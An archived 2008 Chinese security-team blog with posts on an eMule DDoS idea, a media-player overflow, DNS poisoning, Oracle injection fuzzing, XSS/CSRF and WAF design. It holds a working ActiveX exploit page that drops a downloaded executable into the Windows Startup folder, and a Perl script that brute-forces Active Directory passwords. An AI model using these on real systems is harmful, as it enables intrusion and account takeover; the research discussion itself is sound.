Ph4nt0m Security Team

[News]This blog is dead

2008-08-07T19:41:00.000-07:00

by axis
2008-08-08
http://www.ph4nt0m.org

Dear all, axis here.

I'm very sorry to announce that this blog is finally dead today.

Because the Great Fire Wall(which is a project held by the Chinese gov) have banned most of the Chinese people to visit blogspot, and the number of our blog's visitors is decreasing.

Another reason is that the members of Ph4nt0m do not have enough time to update tips and papers. We all have much work to do. In China, it is hard to have an ease life until you have earned a lot of money. So we won't have enough spare time to do those things we like before we found some place to live.

The blog is dead, but Ph4nt0m is not, and is never going to. I finally deside to close this blog temporarily and hope to re-open it in the future. But this does not mean we won't write blogs any more. We stop to wrtie team's blog, but the members of us may write their own blogs.

Some of our friends like str0ke may get our recent news and sometimes the newest exploits and vulnerability advisories from our Planet(http://planet.ph4nt0m.org).

The Planet is one of Ph4nt0m's projects and it has collected lots of the most famous expects in Chinese Security Fields who write blogs. Of course it contains our members' blog.If you feel it is too slow to visit the Planet, you may use the google reader to track our feeds. You also can find our team members' blog from the "friend links" of this blog.

In a word, we always want to keep contacts with you, our friends, not here, but in the Planet!

And we will keep our security research continued , both for our spirits and better life. So, don't worry, Ph4nt0m is a team which has 7 years old and and won't die if I am here.

中文就不费神写了，一句话，以后看blog去planet吧，这里由于GFW的原因暂时没精力更新了！

[Tips]通过emule做DDOS是否可行？

2008-07-22T18:45:00.000-07:00

by 云舒

2008-07-23

http://www.ph4nt0m.org

今天抽空看了下emule协议几个可能会出问题的地方，初步感觉是可能真的有问题。下了代码回来看了，不过代码太大，目前还没找到地方，没法对想法进行印证。我简单的说下，看哪位代码牛人能够在项目中找到对应的代码。

首先是在客户端连接到服务器之后，搜索文件时，服务器返回结果的报文。报文中返回的结果是一个集合，每个集合表示一条记录。但是每条记录中，并不包含拥有该文件的客户端的IP地址，而是返回的拥有该文件的客户端的ClientID和端口。这里我猜测ClientID的计算是可逆的，搜索发起者可以根据这个 ClientID计算出IP地址，然后连接，请求下载文件。具体报文结构如下：

名称	大小（字节）	默认值	注释
协议类型	1	0xE3
大小	4		不包含报文和大小域的报文大小
类型	1	0x16	操作码 OP SEARCHRESULT 的值
结果数	4	N/A	此报文中包含的结果数目
结果列表	可变	N/A	一个结果的列表

搜索结果列表项格式：

名称	大小（字节）	默认值	注释
文件HASH	16	N/A	用于识别文件的 Hash 值
客户端 ID	4	N/A	eMule服务器分配给客户端的ID
客户端端口	2	N/A	客户端的监听的TCP端口
标志数	4	N/A	其后的属性标志个数
标志列表	可变	N/A	标志列表

其次的第二个地方是下载文件的地方，客户端要求下载一个文件时，服务器会返回一个源查找结果报文。该报文也是只包含源的ClientID和端口，客户端应该是按照ClientID计算出IP地址，再去连接下载文件的。具体报文如下：

名称	大小（字节）	默认值	注释
协议类型	1	0xE3
大小	4	N/A	不包含报文头和大小域的报文大小
类型	1	0x42	操作码 OP FOUNDSOURCES 的值
文件HASH	16	N/A	相关文件的 Hash 值
源数量	1	N/A	拥有该文件的机器的数量
源列表	可变	N/A	源列表内容，每一条是一个可用源

每一条源的报文格式如下：

名称	大小（字节）	默认值	注释
客户端 ID	4	N/A	共享该文件的客户端的 ID
客户端端口	2	N/A	共享该文件的客户端端口

可以看到，搜索某个文件时，服务器返回的搜索列表中按照ClientID来区分不同的其它客户端。在开始下载一个文件时，服务器返回的可用源列表中，每个源也是以一个ClientID来表示的。也就是说，没一个ClientID就可以确定一个源，区分开彼此。而emule可以根据这个ClientID找到对应的客户端，去连接指定端口，请求文件。那么，现在的问题是这个ClientID是哪里来的？

原来这个ClientID在正常情况下，是我们连接到emule服务器时，服务器分配给我们的。但是注意到，在连接之后，我们可以像服务器提供我们所拥有的文件列表，报文格式如下：

名称	大小（字节）	默认值	注释
协议类型	1	0xE3
大小	4		不包含报文和大小域的报文大小
类型	1	0x15	操作码 OP SEARCHRESULT 的值
文件数	4	N/A	共享列表中的文件数，这个数不超过 200
文件列表	可变	N/A	可选的文件列表,单个项的描述见下

单个文件条目描述我就不细写了，比较有用的字段是文件Hash码，ClientID，以及端口。这样看来，我们在连接到服务器之后，告诉它baidu的IP地址，TCP80端口，有赤壁下载，或者有XXX片下载，别人下载的时候，emule客户端会不会从服务器返回的可用源列表中，找到这条记录，并且去连接？

关键问题到了ClientID的计算，协议中这样描述的：假设 IP 地址为 X.Y.Z.W,则客户端 ID 按公式 X+28*Y+216*Z+24*W (Big Endian[6])计算。如果想法是正确的，那么我们可以先计算出百度的IP地址的ClientID，端口设置为80，然后通知服务器，这个 ClientID有高树的片子可以看……

是不是可行？我不知道，等我找到对应的代码，可能要到过年了。

[Tips]暴风影音2008Beta1 最新远程溢出 0day 分析

2008-07-20T02:53:00.000-07:00

by dummy
http://2008-07-20
http://www.ph4nt0m.org

已近将此漏洞报给暴风.

声明：纯技术研究，禁止将本文相关代码非法用途！后果自负！

下载地址: http://dl.baofeng.com/storm3/storm2008-beta1.exe

一、漏洞分析

今天下午帮同事查找一个软件和新版本暴风兼容性的问题，发现其新增了新的模块，回来就试了一下，运气真好被我到一个远程溢出。

问题模块是暴风的视频加速程序，暴风的视频加速功能是通过设置浏览器代理实现的，这个代理服务器（HttpServer.dll）会在本机开 8089 端口监听处理请求，因为此端口绑定的地址不是localhost, 从而导致此溢出可以被远程利用。

使用 od 打开暴风安装目录下的 box/Stline.exe，这个程序记视频加速模块的主程序文件，按下 F9 让 Stline.exe 跑起来，然后打开 IE 在地址栏中输入 http://baidu.com/111...11.flv (长度必须大于1000) 回车。Od 在 stormtra.dll因为异常暂停下来，如下图:

Ebx = 堆栈的栈顶，dx 是我们输入的 1, 把堆栈窗口拉到最高处，看到堆栈中填满了我们的输入的 URL 拷贝。使用 ida 打开这个 stormtra.dll 进行上下文分析，如下图：

发生异常的函数是在 unknown_libname_98 里，而 unknown_libname_98是 _vscan_fn 的回调，通过sub_1003AE2C 参数判断这个是正则表达式 search 函数，溢出正是在这个函数里面发生，具体为什么这个 search 过程发生溢出暂时可以不用管。

然后在 od 中 shift+f8 忽略异常，接着od 再次断下，如下图，这时eip = 0x00310031, 这是因为溢出后，操作系统从堆栈取异常处理函数，但是堆栈中被填满了我们的输入。

到这里已近可以看到我们的输入成功控制了 eip，那我们离成功也更进了一步了。

二、编写 shellcode

在 od 中注意我们的输入显示的 unicode 串，以前没有搞过此类的溢出，只知道比 ascii 麻烦很多，请教了123 大牛，他给我了一个同类溢出程序的 webdav (参考四)，试着改了一下，但是不打算继续放相关代码了，有兴趣自己调吧:)。

四、参考资料

Webdav 远程溢出漏洞分析http://www.xfocus.net/articles/200303/500.html

[Tips]The Week of Baidu Bugs

2008-07-17T05:31:00.000-07:00

[Tips]PECompact 2.x的脱壳点滴

2008-07-17T05:28:00.000-07:00

by void
2008-07-17
http://www.ph4nt0m.org

遇到一个程序加的是这个壳,Dump,修复IAT,不能运行.用Ollydbg跟踪到这里:

00406E00      68 68F04200   PUSH    42F068 ; ASCII "PEC2_IsPacked"
00406E05      6A FF         PUSH    -1
00406E07      FF15 AC504200 CALL    DWORD PTR [4250AC]
00406E0D      A3 08AF4400   MOV     DWORD PTR [44AF08],EAX

搜索"PEC2_IsPacked",找到PECompact的官方文档,原来是壳的API Hook插件在捣鬼,把MOV [44AF08],EAX改成MOV [44AF08],1.
保存修改.正常运行.

[Tips]DNS缓存中毒漏洞的一点推测

2008-07-17T05:25:00.001-07:00

by 云舒
2008-07-15
http://www.ph4nt0m.org

今天他们在群里面说到最近的DNS缓存中毒漏洞，并且绿盟的公告中提到了一些细节性的东西，地址是http://www.nsfocus.net/vulndb/12124。因此根据公告，我稍微推测下这个漏洞的一些问题。

首先是如何攻击的推测。这个根据公告，应该能看出一些端倪。首先使用nslookup查询某个域名的权威解析服务器名称，得到其IP地址，这样就可以生成一些伪造源IP地址和DNS ID的DNS Response数据包。然后向目的DNS服务器查询目的域名，提交了查询之后，马上快速发送生成的伪造DNS Response数据包给目的服务器。让目的DNS在真实的权威DNS服务器响应到达之前，接受到恶意的应答。

但是这里有一个难点：一个大站点的域名，在攻击者请求查询的时候，基本上100%已经存在缓存了。攻击者发起DNS查询时，DNS服务器直接从缓存应答了，根本不会去请求权威域名服务器。解决这个问题，有两个办法，第一个是攻击一个生僻的域名，或者不存在的二级域名，比如说把 fuck.google.cn解析到1.2.3.4，用来钓鱼或者挂马用；第二个办法，是不停的给目的DNS服务器发送恶意的DNS Response数据包，增大碰到缓存过期需要更新数据的几率。不过这样又带来了新的问题，很可能这样的投毒，最终变成了UDP Flood了。

其次是攻击结果的推测。如果攻击一个不存在的二级域名，最终只能用来钓鱼或者挂马，但是如果能够攻击到主域名，则可以做任何事情了，比如说上海用户看到的 baidu变成了sex站点。攻击不存在的二级域名比较容易，只要知道DNS ID的可选数字就行了，一次生成足够的数据包发过去，然后就看怎么骗人访问了。想让主域名中毒，黑掉站点，那就比较难了。

看得比较随意，不知道推测的是不是对的，等等看吧。

[Tips]企业内部AD脆弱密码审计

2008-07-08T19:32:00.000-07:00

by 云舒
2008-07-09
http://www.ph4nt0m.org

这个是前段时间做的个小脚本，没什么用，审计内部AD脆弱密码的。做这样一些简单的工作，脚本语言确实挺合适的。需要一个普通的AD账号，导出账户名，过滤掉禁用的，然后开始扫描。密码字典按照自己公司的实际情况写就好了，支持%USERNAME%123这样的格式。

脚本里面的各种参数我写死了，因为自己用，不必要敲参数。如果想要用用看，自己改就是了，perl这种东西简单的学一下的话，一个上午就够了。下午不行，这种天气下午只适合睡觉，或者吃点冰绿豆汤之类的东西，反正是不适合看代码。

1.
 #!/usr/bin/perl
 2.

 3.
 use warnings;
 4.
 use strict;
 5.
 use Win32::OLE;
 6.
 use Data::Dumper;
 7.
 use Authen::Simple::ActiveDirectory;
 8.

 9.
 use constant ADS_UF_ACCOUNTDISABLE => 2;
 10.
 use constant ADS_SCOPE_SUBTREE => 2;
 11.

 12.
 my $server = 'bj.microsoft.com';
 13.
 my $domain = 'bj.microsoft.com';
 14.
 my %users;
 15.
 my @pwds;
 16.

 17.
 select( STDOUT );
 18.
 $| = 1;
 19.

 20.
 print "Loading account from ad";
 21.

 22.
 &LoadUser( );
 23.

 24.
 print "done!n";
 25.
 print scalar(keys(%users))." users loaded!n";
 26.

 27.
 print "Loading password from dic";
 28.
 &LoadPwd( );
 29.
 print "done!n";
 30.

 31.
 open( REPORT, ">report.txt" ) || die "create report error: $!n";
 32.
 select( REPORT );
 33.
 $| = 1;
 34.
 select( STDOUT );
 35.

 36.
 foreach my $user( keys(%users) )
 37.
 {
 38.
 foreach my $pwd( @pwds )
 39.
 {
 40.
 $pwd =~ s/%USERNAME%/$user/;
 41.

 42.
 my $ret = &TestPwd( $user, $pwd );
 43.
 if( $ret == 1 )
 44.
 {
 45.
 print "cracked! username=$user,password=$pwd,mail=".$users{$user}."n";
 46.
 print REPORT "cracked! username=$user,password=$pwd,mail=".$users{$user}."n";
 47.

 48.
 last;
 49.
 }
 50.
 #print "testing [$user/$pwd] n";
 51.
 }
 52.
 }
 53.
 close( REPORT );
 54.

 55.
 sub LoadUser
 56.
 {
 57.
 my $objConnection = Win32::OLE->new( "ADODB.Connection" );
 58.
 my $objCommand = Win32::OLE->new( "ADODB.Command" );
 59.

 60.
 # open ad
 61.
 $objConnection -> open( "Provider=ADsDSOObject;" );
 62.

 63.
 $objCommand -> {"ActiveConnection"} = $objConnection;
 64.

 65.
 # search what and how
 66.
 my $cmd = "select userAccountControl,distinguishedName,mail from 'GC://dc=bj,dc=microsoft,dc=com' where objectCategory='user'";
 67.
 $objCommand -> {"CommandText"} = $cmd;
 68.

 69.
 # import all users
 70.
 $objCommand -> Properties -> {"Page Size"} = 1000;
 71.
 # search all subtree
 72.
 $objCommand -> Properties -> {"searchscope"} = ADS_SCOPE_SUBTREE;
 73.

 74.
 my $objRecordSet = Win32::OLE->new( "ADODB.Recordset" );
 75.
 $objRecordSet = $objCommand->Execute( ) || die "query data from active directory error,exitn";
 76.

 77.
 while( not $objRecordSet -> eof )
 78.
 {
 79.
 my $intUAC = $objRecordSet -> Fields("userAccountControl") -> value;
 80.

 81.
 # remove diable account
 82.
 if( not ( $intUAC & ADS_UF_ACCOUNTDISABLE ) )
 83.
 {
 84.
 my $longName = $objRecordSet -> Fields("distinguishedName") -> value;
 85.
 my $mail = $objRecordSet -> Fields("mail") -> value;
 86.

 87.
 if( (!defined($mail)) or $mail eq "" )
 88.
 {
 89.
 $mail = "null";
 90.
 }
 91.
 if( $longName =~ /^CN=([w.-_]+),/ )
 92.
 {
 93.
 #print ."n";
 94.
 my $userName = $1;
 95.

 96.
 chomp( $mail );
 97.
 chomp( $userName );
 98.

 99.
 $users{$userName} = $mail;
100.
 }
101.
 }
102.
 $objRecordSet -> MoveNext();
103.
 }
104.
 }
105.

106.
 sub LoadPwd
107.
 {
108.
 open( FH, "<pass.txt" ) || die "Open password dict error,exit!n";
109.

110.
 @pwds = <FH>;
111.
 chomp( @pwds );
112.
 }
113.

114.
 sub TestPwd
115.
 {
116.
 my $username = shift;
117.
 my $password = shift;
118.

119.
 my $ad = Authen::Simple::ActiveDirectory -> new( host => $server, principal => $domain ) || die "Connected error: $!";
120.

121.
 if ( $ad->authenticate( $username, $password ) )
122.
 {
123.
 return 1;
124.
 }
125.
 else
126.
 {
127.
 return 0;
128.
 }
129.
 }
130.

[Exploit]Microsoft Office Snapshot Viewer ActiveX Exploit

2008-07-08T10:03:00.000-07:00

by cloie
2008-07-08
http://www.ph4nt0m.org

今天有人发了个Snapshot Viewer的ADV，结合CERT那篇dranzer.pdf，重现漏洞

EXP:

<html>
<object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9' id='obj'></object>
<script language='javascript'>
var buf1 = 'http://127.0.0.1/a.exe';
var buf2 = 'C:/Documents and Settings/All Users/「开始」菜单/程序/启动/test.exe';
obj.SnapshotPath = buf1;
obj.CompressedPath = buf2;
obj.PrintSnapshot();
</script>
</html>

Fuzzing时一般是对单个Property和单个Method()做FUZZ，这时会检测到对SnapshotPath有HTTP GET。然后想想它总是需要保存到本地的，再测试其他Property。由于此ActiveX的Property和Method都非常少，很快可以 FUZZ完

[Tips]学习WebZine [0x02]后乱谈

2008-06-24T19:30:00.000-07:00

by Superhei
2008-06-25
http://www.ph4nt0m.org

这里学习了下自己看的明白的PP

[PSTZine 0x02][0x07][乱谈之XSS攻击检测]

这个文章里提到了几个有趣的漏洞：

1.phpinfo() 4096字节后的xss,这个漏洞要是不去分析php的源代码是没有办法发现的，很多人看应用程序的原代码只去分析溢出等问题，但是忽视了应用上的安全，这个还是要看发现者的意识，SE大牛分析php代码就不放过应用上的安全。而且就web程序的漏洞现在主要是看细节，而发现这些细节最好的办法就是分析 php本身的代码

2.word脚本执行漏洞，对于这个漏洞在hi群里很多人都测试过，没办法创建对象，所以不可以通过wsh等对象执行命令，但是他可以访问url，这个我们就可以做很多事情[相当于一个csrf]，比如引入一个gmail的xss的url，当你打开一个doc文件的时候你的gmail的cookie就被别人偷了。就这个类型的程序利用还有很多比如pdf 比如最近有人发的[rar自解压文的挂马]... 可以做个应用程序的crsf攻击专题？以后的那些主动防御是不是还要防偷cookie的小偷呢？:)

[这里顺便说下我对csrf的理解，csrf可以认为是一种漏洞类型，但是同时也是一种攻击方式]

[PSTZine 0x02][0x06][深入挖掘ORACLE内部SQLINJECTION]

对于kj这个文章我绝对标题把"挖掘"改为"分析"或者"调试"更加好，对于挖掘他这个文章里提到的方法是不科学的，因为他"挖掘"的前提是用了人家公布的POC/EXP。

对于ORACLE里的SQLINJECTION的基本有2个方法[文章也有提到]

1.白盒[文章也没有提到具体的]

在John McDonald大牛的blog上有篇文章：http://taossa.com/index.php/2006/12/26/stored-procedure-sql-injection-cheat-sheet/

对于白盒来说我们要grep的关键词：

he best way to find these is to do a case insensitive substring search for the following: EXEC, DBMS_SQL, and OPEN.

2.黑盒
在kj文章最后提到的fuzz那才是挖掘

这里说一下ORACLE简单的FUZZ，可以查询ALL_OBJECTS找出所有的package function
procedure与ALL_ARGUMENTS关联获取执行对象的参数类型！

简单介绍具体的几个步骤如下：

a.根据object_name得到package的object_id

SQL> select object_id,object_type from all_objects where object_name='DRILOAD';

OBJECT_ID OBJECT_TYPE
---------- ------------------
30192 PACKAGE
30243 PACKAGE BODY

b.根据object_id得到函数/过程名

SQL> SELECT DISTINCT PROCEDURE$ FROM SYS.ARGUMENT$ WHERE OBJ#=30192;

PROCEDURE$
------------------------------
BUILD_DML
RESOLVE_SQE
VALIDATE_POL
VALIDATE_STMT

c.得到具体PROCEDURE$的参数个数及类型

SQL> select distinct position#,argument,pls_type from sys.argument$ where obj#=30192 and PROCEDURE$='VALIDATE_STMT';

POSITION# ARGUMENT PLS_TYPE
---------- ------------------------------ ------------------------------
1 SQLSTMT VARCHAR2

d.构造fuzz数据

SQL> CALL CTXSYS.DRILOAD.VALIDATE_STMT('''');
CALL CTXSYS.DRILOAD.VALIDATE_STMT('''')
*
ERROR 位于第 1 行:
ORA-06510: PL/SQL: 无法处理的用户自定义异常事件
ORA-06512: 在"CTXSYS.DRILOAD", line 42
ORA-01756: 括号内的字符串没有正确结束

上面的步骤只是简单介绍，具体实现起来还有很多细节要注意[如得到package的所有者如DRILOAD的所有者CTXSYS]，花哥已经根据上面的原理实现了一个fuzz，效果还是有的如：http://superhei.blogbus.com/logs/20127819.html

另外：对于kj文里的“当然最好是审核一下FUZZ的对象EXECUTE权限是否为PUBLIC”，这个是没有必要的，而且对于高权限用户的PACKAGE还是有意义的。对于oracle里的注射在web上利用一直都是围绕着2个问题:

a."权限提升"
b."执行多语句"

但是oracle里的function调用是很复杂的，比如一个sys的A()里有权限，但是它对PUBLIC没有execuite权限，但是可以被另外一个B()调用，B()的EXECUTE权限是PUBLIC，所以一样可能被利用，而且对于web上的inj 很多连接用户的权限很高，通过注射可以执行多语句。

[PSTZine 0x02][0x04][浅析浏览器的跨域安全问题]

这个文章比较有意思，首先介绍这个文章的一些8挂：

首先要从bluehat还是Manuel Caballero的一个题目讲起，由于bluehat的变态[不公布ppt等资料]，但是在bluehat的新闻介绍里无意发了个pic[这个pic我现在找不到了]，被sdc看到了于是从那个pic给出点信息开始研究测试，终于有了：http://sirdarckcat.blogspot.com/2008/05/browsers-ghost-busters.html，接下来就是pdp的介绍推广:http://www.gnucitizen.org/blog/ghost-busters/。对于有价值的信息我是很愿意共同享受的，于是我看到他们的blog 并发在了hi群里一起测试讨论。于是qz测试后有了这个文章，并且有了新的进展 :)。不过最后我在和参加过bluehat的朋友讨论，但是这个朋友告诉我：Manuel Caballero在bluehat上讲的根本不是这个问题 .....

最后bs下ms的恶心，为了得到bluehat的ppt[主要是web的]，我找了很多朋友，只有kuza55分享了他的 ppt，还问了kuza55和sowhat是否有其他的ppt，但是他们告诉我ms不让给出来他们的资料，于是我偷偷的email给Manuel Caballero没有回音，不过我还没死心，由于近年来国内暴了很多ms的0day，导致ms可能想和国内的安全人员拉拉关系于是出现了几个ms 安全部门的中国人。于是我想通过他们偷偷share下bluehat的ppt，但是最后的结果还是失败....

对于这个文章在技术方面的关键主要有2个：

a. {toString:function(){return "some-string";} 看了pdp的blog上可以发现这个方法是通过大量测试得到的结果 ?
b.javasript: 这个就是qz文里的关键利用，因为qz的测试分析思路是值得学习的 :)

[PSTZine 0x02][0x09][如何识别高级的验证码]

对于这个文章里的技术我是不怎么懂的，这里主要是感慨一下，文中的利用主要都是在gui下识别，对于csrf 和web自动化估计是没太大意义 :(

对于其他的文章不在我搞的范围........

rar-gmailxss.bmp http://docs.google.com/File?id=dd9wcvmj_5dbhzqggj_b

word-gmailxss.bmp http://docs.google.com/File?id=dd9wcvmj_3ncwwzjs6_b

[Tips]浏览器cookie安全机制和csrf

2008-06-24T19:29:00.000-07:00

by axis
2008-06-25
http://www.ph4nt0m.org

这两天hi群里在讨论关于csrf实现条件的问题，茄子指出了在IE环境下，csrf只是针对session cookie有效，而本地保存的stored cookie在变成当前IE的session cookie前，跨域提交是会被IE阻断的。

通俗来讲就是如果浏览器进程中没有缓存过第三方站点，没访问过，那么使用img/ iframe 标签等跨域访问第三方站点是会被阻断发送cookie的。这时候的CSRF就会仅仅只是get或者post请求，而不会发送cookie，那么很多需要验证的提交都会失败。

实际上这里是浏览器的一个cookie安全机制，不光是img 、 iframe等标签，直接跨域 post或者 get都可能出现这种问题（使用session cookie和 stored cookie的区别）。

我以前做的一个xss测试， xss成功了3000多次，但 csrf 的一个跨子域的请求却只成功了 100多次，当时总找不到原因，以为是payload稳定性的问题，现在想来应该就是这个跨域提交被阻断cookie的原因了。

那么根据设想，为了提高csrf的成功率，我们可以在xss后使用一次 window.open（），让用户开个小窗先访问下需要csrf的域，刷出来一个session cookie，然后就可以csrf了。不过这个想法还需要测试，而且也不够隐蔽。

PS: Firefox不存在这种阻断cookie的机制

茄子的tips：
http://xss.betaslife.com/blog/?p=24

[Tips]WAF(Web Application Firewall) and Code Review

2008-06-24T19:28:00.000-07:00

by axis
2008-06-25
http://www.ph4nt0m.org

最近对于这两种方法的争论挺多的。

实际上，在我思想中，企业搞web安全，这是两个主攻方向了。(PCI标准也这么要求)

我习惯上把WAF归纳为过滤层，就是在应用的架构中有这么一个 filter-tier, 他起的作用是过滤和净化危险输入。在架构中的位置可以是多样化的：单独的硬件、apache mod、应用里面捕获输入；

WAF如果开启阻断功能的话，就可以起到虚拟补丁的功能。在这个意义上来说，可以减小程序员的工作量。

而WAF的最大阻力则是：
1. 误报
2. 对性能的影响
3. 稳定性

而AppSec这些公司推的WAF都属于硬件产品。包括mod-security等，他们都自己有一套漏洞规则，然后卖给甲方。这也是他们产品难推的原因，尽管你吹的天花乱坠，但实际上敢开启block模式的估计不会有多少，实际上jeremiah grossman自己也承认了，并引用了一段话

“When you know nothing, permit-all is the only option. When you know something, default-permit is what you can and should do. When you know everything, default-deny becomes possible, and only then.”

要了解所有的东西，就要从一开始就上WAF，对于很多半路出家搞安全的网站来说，这显然是很难接受的。

所以真正要实现好的WAF，只能是自己开发，自己部署，通过“学习模式”，来消除误报。而且自己的东西，是可控的，至少从心理上来说是可控的。

WAF的模式是有一定的作用，但不是万能的，也没厂商吹嘘的那么玄乎。这玩意治标不治本，无法带给你的网站安全；只有有人不断专业维护的WAF，才能从一定程度上说可以带给你安全。这就是我一直在强调的：安全是一个持续的过程。

与WAF对应的另外一个方向是code review。 code review也有很多方向，不是随便从网上抄个规范来就行的。同样的，code security review可以做为sdl中的一个核心过程，在软件工程中发扬光大。每个企业都需要找到自己代码的特色，从而定制出符合自己特色的代码规范，和代码漏洞扫描工具。这些思想也是我在《安全幻想曲2008》中曾经强调过的，可惜从CB的反馈看来，真正能看懂我那篇paper背后意思的人的恐怕不多。

code review 是一个治本的过程，也需要长期坚持。不过review code的成本会比较大，有人力也有时间的投入，还有更多的沟通成本。code review的方向应该是尽可能降低对个人经验的依赖，这就需要有优秀的规范和规则。

在应用安全里， WAF和code review应该是相辅相成的。但是我看现在不少厂商为了牟利，鼓吹WAF的优越性，让WAF走上了歪路，企业冤枉钱花了，却只是一个花架子的安全，一戳就破。如何正确应用，才是甲方安全人员需要思考的问题。

先瞎扯这么多，这两个话题可以讲很深，以后再慢慢一一侃来。

[Tips]安全部门和运维部门

2008-06-24T19:27:00.000-07:00

by 云舒
2008-06-25
http://www.ph4nt0m.org

前几天在《无线网络安全之三》中提到了运维部门KPI的问题，这里重新把它拉出来，顺便说点别的。太多的网络维护人员，鉴于网络稳定性在KPI中占的比重，不愿意对网络做一点点无害的改动。只要目前的网络没有瘫痪，他们可能就不愿意去做改进了，更愿意保持现在的样子继续运行。后期安全策略的推进，真的是一个很困难的事情。安全应该在设计当初就考虑进去，可是没有企业在创业当初就去做这方面的投入吧，毕竟安全对创业公司来说是一种投入和伤害。让步一点的说，尽可能早的考虑进去，在公司网络规模还不是过于庞大杂乱的时候，开始部署安全策略，已经是很有远见的战略了。

对于一般的运维部门经理或者总监，安全不在他们的考虑范畴之内。他们在意的安全，仅仅是数据是否有恰当的备份，机房的电力是否足够充裕，温度是否足够低，负载均衡设备是否能够支撑，带宽是否足够快等等。从广义的安全来说，这些确实也是安全部门应该考虑的问题。但是毕竟这只是广义安全中的一部分，而且是不被安全部门的上级老板认为是安全部门成绩的部分，因为这部分是由运维部门来实施的。这里安全部门和运维部门就会有冲突了，运维部门考虑的安全是广义安全的一部分，他们愿意实施的也是这一部分，而这一部分恰好是狭义的安全所不关注的，不被安全部门上级老板认为属于安全部门成绩的那一部分。另一方面，被上面老板认为是安全部门成绩的那一部分狭义的安全，安全需要努力去做的那一部分，恰好和运维的KPI某种意义上相冲突。

简单的说，狭义安全和运维是冲突的。运维喜欢做的，是狭义安全不重视的。安全喜欢做的，是运维反感的。解决这个问题，一般来说是依靠沟通。不过我总觉得沟通不是长久之计，而且不同公司不同的风格，沟通起来更为困难。而且沟通是一个主动性的东西，需要强制性的东西来保障才是最可靠的。我觉得组织结构是比较好的办法，也就是说让运维的KPI和安全的KPI归结到一个人的身上。系统管理，网络运维，IT内网，安全部门，四个部门统统归结到一个大部门的下面，大部门总监的业绩，既包括运维，也包括安全，因此，他自然会考虑如何去协调安全和运维的比重。

[News]Ph4nt0m Security Team WebZine 0x02

2008-06-18T00:43:00.000-07:00

by axis
2008-06-18
http://www.ph4nt0m.org

今天，我们非常欣喜的宣布我们完成了第二期webzine的制作。这是许多人共同努力的
结果，汇聚了大家的心血。

在本期中，文章数比第一期多出了一倍，涉及的话题更广泛。同时我们开辟了一个新的
栏目：interview。以后每期都会对安全界的一些知名人士进行一些采访，让大家能够更加近
距离的了解牛人。

本期中有不少文章是投稿的作品，比如lisl03的关于绕过主防的shellcode、xy7的关于
xss检测的文章等。也是他们的支持，才使得webzine更有活力。

本期特别推荐的文章是《如何识别高级的验证码》，这篇文章可能对安全人员来说有点
难度，但是验证码的对抗却是以后非常重要的一个发展方向。此文主要值得我们借鉴的是怎
样的设计才是一种优秀的验证码。

还有rayhac（茄子宝）写的关于浏览器跨域问题的paper，他根据ghost页面的问题扩展讨
论开来，简单谈了谈浏览器跨域漏洞，最后更是给出了一个ie跨域0day。同时他也将在blog
上发布另外一篇姊妹篇的文章，进一步完善他的跨域exploit。

提到茄子，不能不提新近成立的安全组织80sec，这是剑心创立的一个专注于web安全的
小团体，组织比较灵活，更近于社区的形式，本期摘录了80sec的两位成员的paper，感谢80sec
为webzine做出的贡献。

好文章很多，不一一点评了，把时间留给诸位看官。任何问题（包括投稿）可以联系
root@ph4nt0m.org

最后让我们欢迎PST的新成员dummy。

http://webzine.ph4nt0m.org

镜像地址(Mirror Address)：
http://www.icylife.net/pstzine/0x02/index.html
http://www.80sec.com/pstzine/0x02/index.html
http://www.neeao.com/pstzine/0x02/index.html
http://www.cncert.net/pstzine/0x02/index.html

[Tips]无线网络安全之三

2008-06-12T00:05:00.000-07:00

by 云舒
2008-06-12
http://www.ph4nt0m.org

很久之前写过两篇关于无线网络的文章，一篇是《企业无线局域网安全》，一篇是《无线路由折腾之一》，简单介绍了目前企业无线局域网设计中常用的安全标准，以及认证方面的风险。但是限于一些原因，我没有给出任何网络设计上面比较详细的方案描述，这里想稍微写一点，点到即止。而且即时知道了这里的一点架构方面的东西，也是无法攻击的，就像公开的加密算法一样。

06年初的时候，负责设计了我的第一个无线网络安全方案。由于实际用户群比较窄，只针对公司内部人员，主要是技术人员，因此在安全方面看重的是身份认证的强度和数据传输加密防篡改的强度，而不去过多的关注用户授权。因此，在身份认证方面，我选择了动态口令认证，即所谓一次性密码，保证了非法用户无法接入网络。数据传输方面，没有使用比较常用的AES或者TKIP，而是使用了IPSec VPN通道的方式。用户使用通用密码连接到AP之后，各自处于只有自己一个用户的独立隔离的VLAN中，且无法访问除VPN Server之外的任何服务器，这里的VPN Server可以是无线交换机提供的VPN终结功能。只有手动发起VPN连接通过动态口令认证，才可以访问到内部资源。

最近设计了一个新的无线网络安全方案，跟上面的颇有不同。主要是用户群比较杂乱，多个部门多重身份需要使用无线网络。在后期要对用户能够做比较好的审计，而对于认证和传输没有太高的要求，可以稍微放松。因此，这里使用了ACS服务器结合后台的Radius服务器来做身份认证，根据不同的用户名选择不同的认证方式，并根据AD信息划分动态的VLAN赋予相应的权限。传输加密方面，则使用了WPA2标准中的AES-CCMP算法。对比上面的方案，在认证和加密传输安全性上面略有下降，而授权以及审计功能，有所增强。

设计这个新的方案的时候，还有一个小插曲，刚好是木桶理论的印证。有人要求给一个特定的群体所有网络的访问权限，并且给这个群体使用一个比较简单的统一的密码。对于这样的需求，很显然，是整个设计中最薄弱的一环，也就是说实施了这个需求，其实上面的所有安全措施都是无效的。因为防线上有一个缺口，攻击者就可以从缺口绕过整个防线，避开了堡垒对后面进行攻击。

目前来说，设计无线网络安全方案没有太多可以选择或者设计的余地，主要的只是和各部门无休止的沟通，需求很难整理清楚。这里插一句题外话，其实可以写一篇新的文章，但是觉得不太好，就插到这里。那就是KPI的危害。太多的网络维护人员，鉴于网络稳定性在KPI中占的比重，不愿意对网络做一点点无害的改动。只要目前的网络没有瘫痪，他们可能就不愿意去做改进了，更愿意保持现在的样子继续运行。后期安全策略的推进，真的是一个很困难的事情。安全应该在设计当初就考虑进去，可是没有企业在创业当初就去做这方面的投入吧，毕竟安全对创业公司来说是一种投入和伤害。让步一点的说，尽可能早的考虑进去，在公司网络规模还不是过于庞大杂乱的时候，开始部署安全策略，已经是很有远见的战略了。

